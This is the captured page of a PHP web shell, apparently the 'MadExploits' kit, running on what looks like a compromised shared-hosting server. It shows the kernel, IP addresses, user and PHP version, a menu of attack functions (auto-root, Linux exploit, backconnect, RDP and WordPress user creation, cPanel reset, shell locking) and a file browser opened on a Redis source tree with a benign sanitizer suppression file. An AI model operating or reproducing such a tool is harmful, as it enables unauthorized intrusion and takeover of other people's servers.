Linux frigo.o2switch.net 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
Apache
: 109.234.164.159 | : 216.73.216.87
Cant Read [ /etc/named.conf ]
8.3.33
lavi4235
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
redis-8 /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
commands
[ DIR ]
drwxrwxr-x
modules
[ DIR ]
drwxrwxr-x
redis-benchmark
4.01
MB
-rwxr-xr-x
redis-check-aof
17.11
MB
-rwxr-xr-x
redis-check-rdb
17.11
MB
-rwxr-xr-x
redis-cli
4.87
MB
-rwxr-xr-x
redis-sentinel
17.11
MB
-rwxr-xr-x
redis-server
17.11
MB
-rwxr-xr-x
redis-trib.rb
3.52
KB
-rwxrwxr-x
tsan.sup
1.11
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tsan.sup
# collect_stacktrace_data() calls backtrace() from a signal handler but # backtrace() is signal-unsafe since it might allocate memory, at least on # glibc 2.39 it does through a call to _dl_map_object_deps(). signal:collect_stacktrace_data signal:printCrashReport # TODO Investigate this race in jemalloc probably related to # https://github.com/jemalloc/jemalloc/issues/2621 race:malloc_mutex_trylock_final # A race can happen on conn->last_errno if replica client is reading/writing # data in IO thread and main thread is calling connAddrPeerName for some reason # (f.e genRedisInfoString/roleCommand...). # Not worth the additional code for synchronization as: # - errno is thread-safe according to POSIX std # - we don't support systems that allow word tearing, i.e last_errno value would # be a correct value at the end - either the errno from main or from IO thread # - even if we fix the data race on last_errno we still have the problem of it # being set to either errno unless we pause the IO thread during main-thread's # execution which would incur too big of a cost. # - the race happens rarely race:connSocketAddr
Close